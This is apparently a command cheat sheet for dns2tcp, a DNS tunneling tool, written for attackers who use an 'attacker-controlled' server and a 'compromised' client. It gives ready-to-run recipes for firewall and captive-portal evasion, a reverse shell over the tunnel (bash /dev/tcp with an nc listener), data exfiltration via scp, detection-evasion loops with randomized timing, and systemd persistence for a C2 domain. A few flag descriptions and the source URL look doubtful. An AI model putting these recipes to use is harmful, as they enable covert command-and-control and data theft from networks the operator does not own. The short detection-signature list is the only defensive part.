dns2tcp
Overview
dns2tcp is a sophisticated DNS tunneling utility that enables covert TCP traffic tunneling through DNS protocol channels. It encapsulates TCP connections within DNS queries and responses, allowing bypassing of network restrictions, firewalls, and captive portal systems by exploiting the near-universal allowance of DNS traffic on network boundaries.
Installation
Debian/Ubuntu
sudo apt-get update
sudo apt-get install dns2tcpFrom Source
wget http://www.hacking-team.com/dns2tcp/dns2tcp-0.4.2.tar.gz
tar -xzf dns2tcp-0.4.2.tar.gz
cd dns2tcp-0.4.2
./configure
make
sudo make installCompile on macOS
brew install dns2tcp
# Or compile from source with modified MakefileVerify Installation
dns2tcpd -h
dns2tcp -hArchitecture Overview
dns2tcp operates with a server-client architecture:
- dns2tcpd (Server): Runs on attacker-controlled DNS server, accepts tunneled DNS queries, establishes actual TCP connections
- dns2tcp (Client): Installed on compromised/restricted network, sends encrypted DNS tunneled requests
- DNS Protocol: Medium for covert channel encapsulation
- Encryption: Optional authentication and compression support
Server Setup
Basic Server Configuration File
Create dns2tcp.conf:
listen = 0.0.0.0
port = 53
user = nobody
chroot = /var/dns2tcp
domain = attacker.com
key = mysecretkey123
cache_size = 10000
log = syslogStart DNS2TCP Server
sudo dns2tcpd -F -d 3 -f /etc/dns2tcp/dns2tcp.conf| Flag | Description |
|---|---|
-F | Run in foreground (don’t daemonize) |
-d [0-3] | Debug level (0=none, 3=verbose) |
-f file | Specify configuration file path |
-l IP | Listen address binding |
Advanced Server Configuration
# Create chroot directory
sudo mkdir -p /var/dns2tcp
sudo chown nobody:nogroup /var/dns2tcp
# Configure with authentication
echo "listen = 0.0.0.0" > dns2tcp.conf
echo "port = 53" >> dns2tcp.conf
echo "domain = attacker.com" >> dns2tcp.conf
echo "key = secretkey123456" >> dns2tcp.conf
echo "resources = ssh:127.0.0.1:22,http:127.0.0.1:80" >> dns2tcp.conf
# Start server
sudo dns2tcpd -F -f dns2tcp.confServer Configuration Options
| Option | Purpose |
|---|---|
listen | IP address to bind DNS server |
port | DNS listening port (default 53) |
domain | Domain for DNS queries (e.g., attacker.com) |
key | Shared secret for authentication |
user | User to run daemon as |
chroot | Chroot jail directory |
cache_size | DNS cache size in entries |
log | Logging destination (syslog/file) |
resources | Available services format: name:host:port |
Client Operations
Basic Client Connection
dns2tcp -h attacker.com -u example_user -p attacker_password -d 3Establish SSH Tunnel Through DNS
# Connect to SSH through dns2tcp tunnel
dns2tcp -h attacker.com -u demo -d 3 -e passwordInteractive Shell Mode
# Enter interactive dns2tcp shell
dns2tcp -h attacker.com -u user -d 2
# Then type commands to tunnel
ssh
# Command gets routed through DNS tunnelAdvanced Client Syntax
dns2tcp [options] hostname| Flag | Description |
|---|---|
-h hostname | Target DNS server (where dns2tcpd runs) |
-u username | Authentication username |
-p password | Authentication password |
-d [0-3] | Debug level |
-e authtype | Authentication type (password/none) |
-l port | Local listening port for tunneling |
-r resource | Specify resource to tunnel (e.g., ssh) |
-F | Foreground mode |
-T | Text mode (slower, ASCII-safe) |
Tunneling TCP Connections
Simple SSH Tunnel Over DNS
# Server side: Ensure ssh resource configured
# ssh:127.0.0.1:22 in dns2tcp.conf
# Client side: Establish tunnel
dns2tcp -h attacker.com -u tunnel_user -p password -d 2 &
# Connect via tunneled port
ssh -p [local_port] user@127.0.0.1HTTP/HTTPS Tunneling
# Server configuration with web resources
echo "resources = http:127.0.0.1:80,https:127.0.0.1:443" >> dns2tcp.conf
# Client: Establish tunnel
dns2tcp -h attacker.com -u user -d 2
# Access via tunnel
curl http://127.0.0.1:[tunnel_port]Multi-Service Tunneling Setup
# Configure multiple services
cat > dns2tcp.conf << EOF
listen = 0.0.0.0
port = 53
domain = tunnel.attacker.com
key = secure_key_here
resources = ssh:127.0.0.1:22,rdp:127.0.0.1:3389,http:127.0.0.1:80,https:127.0.0.1:443
EOF
sudo dns2tcpd -F -f dns2tcp.confPersistent Tunneled Connection
# Create tunnel in background
dns2tcp -h attacker.com -u user -p password -d 0 &
TUNNEL_PID=$!
# Use tunnel for multiple operations
ssh -p 2222 user@127.0.0.1
scp -P 2222 user@127.0.0.1:/path/file .
# Cleanup
kill $TUNNEL_PIDAuthentication and Security
Server-Side Authentication Setup
# Generate secure key
openssl rand -base64 32 > /etc/dns2tcp/shared_key
# Configure server with key
echo "key = $(cat /etc/dns2tcp/shared_key)" >> dns2tcp.conf
# Share key with authorized clients securelyClient Authentication
# Using username/password
dns2tcp -h attacker.com -u authorized_user -p secure_password -d 2
# Using key-based authentication
dns2tcp -h attacker.com -u user -p $(cat shared_key) -d 2Encryption and Encoding
# Text mode (safer for monitoring)
dns2tcp -T -h attacker.com -u user -d 2
# Binary mode (faster but more detectable)
dns2tcp -h attacker.com -u user -d 2Advanced Tunneling Scenarios
Bypassing Captive Portals
# Connect to external DNS server at attacker.com
# Tunnel SSH connection through DNS
dns2tcp -h attacker.com -u restricted_network -p auth_token -d 2
# Establish reverse shell
ssh -R 3333:127.0.0.1:22 user@tunneled_hostFirewall Evasion Workflow
# 1. Identify accessible DNS servers
nslookup -type=A attacker.com 8.8.8.8
# 2. Start DNS tunnel client
dns2tcp -h 8.8.8.8 -u tunnel_user -p password -d 2 &
# 3. Route traffic through tunnel
# All TCP becomes DNS queries
# 4. Monitor tunnel activity
netstat -an | grep dns2tcpReverse Shell Through DNS Tunnel
# On attacker server
nc -l -p 4444 &
dns2tcpd -F -f dns2tcp.conf
# On compromised client
dns2tcp -h attacker.com -u user -d 2
# Execute: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1Long-Distance Data Exfiltration
# Server setup with logging
dns2tcpd -F -f dns2tcp.conf > dns2tcp.log 2>&1
# Client: Tunnel large file transfers
dns2tcp -h attacker.com -u exfil_user -p password -d 2 &
# Transfer data
scp -P [tunnel_port] local_file user@127.0.0.1:/path/Monitoring and Debugging
Enable Debug Output
# Maximum verbosity (debug level 3)
dns2tcp -h attacker.com -u user -d 3
# Monitor DNS queries
tcpdump -i eth0 'port 53' -vvv
# Monitor tunnel traffic
netstat -an | grep dns2tcpServer-Side Monitoring
# Run server in foreground with debug
sudo dns2tcpd -F -d 3 -f dns2tcp.conf
# Monitor DNS requests in syslog
tail -f /var/log/syslog | grep dns2tcp
# Check active connections
netstat -an | grep ESTABLISHED | grep dns2tcpPerformance Monitoring
# Monitor bandwidth usage
iftop -i eth0 -f "port 53"
# Check DNS query frequency
tcpdump -i eth0 'port 53' -c 1000 | wc -l
# Measure tunnel latency
dns2tcp -h attacker.com -u user -d 2 -T
# Observe response times in debug outputDetecting and Evading Detection
Evasion Techniques
# Use text mode for ASCII-safe encoding
dns2tcp -T -h attacker.com -u user -d 2
# Randomize timing
for i in {1..10}; do
sleep $((RANDOM % 30))
dns2tcp -h attacker.com -u user -d 0 &
done
# Distribute queries across multiple DNS servers
for server in ns1.attacker.com ns2.attacker.com; do
dns2tcp -h $server -u user -d 0 &
doneDetection Signatures
Security teams monitor:
- Unusual DNS query volume (frequency analysis)
- DNS queries with large payloads
- Suspicious domain patterns
- Protocol anomalies in DNS responses
- Long-lived DNS connections
- Repeated queries to same domain
Practical Workflow Examples
Basic Tunnel Establishment
# Step 1: Start server
sudo dns2tcpd -F -f /etc/dns2tcp/dns2tcp.conf
# Step 2: Client initiates tunnel
dns2tcp -h attacker.com -u tunnel_user -p password -d 2
# Step 3: Use tunneled services
ssh -p 2222 user@127.0.0.1Testing Tunnel Functionality
# Server-side test service
echo "HTTP/1.1 200 OK" | nc -l -p 8080 &
# Client tunnel
dns2tcp -h attacker.com -u user -d 2 &
# Test tunnel
curl http://127.0.0.1:8080Persistent Remote Access
# Create systemd service for dns2tcpd
sudo tee /etc/systemd/system/dns2tcp.service << EOF
[Unit]
Description=DNS2TCP Server
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/sbin/dns2tcpd -F -f /etc/dns2tcp/dns2tcp.conf
Restart=on-failure
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl enable dns2tcp
sudo systemctl start dns2tcpConfiguration Templates
Minimal Server Config
listen = 0.0.0.0
port = 53
domain = attacker.com
key = simple_secretEnterprise Server Config
listen = 0.0.0.0
port = 53
domain = c2.attacker.com
key = $(openssl rand -base64 32)
user = dns2tcp
chroot = /var/dns2tcp
cache_size = 50000
log = /var/log/dns2tcp.log
resources = ssh:127.0.0.1:22,rdp:127.0.0.1:3389,http:127.0.0.1:80,https:127.0.0.1:443,socks:127.0.0.1:1080Command Reference Summary
| Purpose | Command |
|---|---|
| Start server | sudo dns2tcpd -F -f dns2tcp.conf |
| Basic tunnel | dns2tcp -h attacker.com -u user -p pass -d 2 |
| Debug mode | dns2tcp -h attacker.com -u user -d 3 |
| Text mode | dns2tcp -T -h attacker.com -u user -d 2 |
| Background tunnel | dns2tcp -h attacker.com -u user -d 0 & |
Related Tools
- iodine — IPv4 over DNS tunneling
- dnscat2 — Command/control over DNS
- ptunnel — ICMP tunneling alternative
- Chisel — TCP tunneling with binary protocol
- ngrok — Reverse proxy tunneling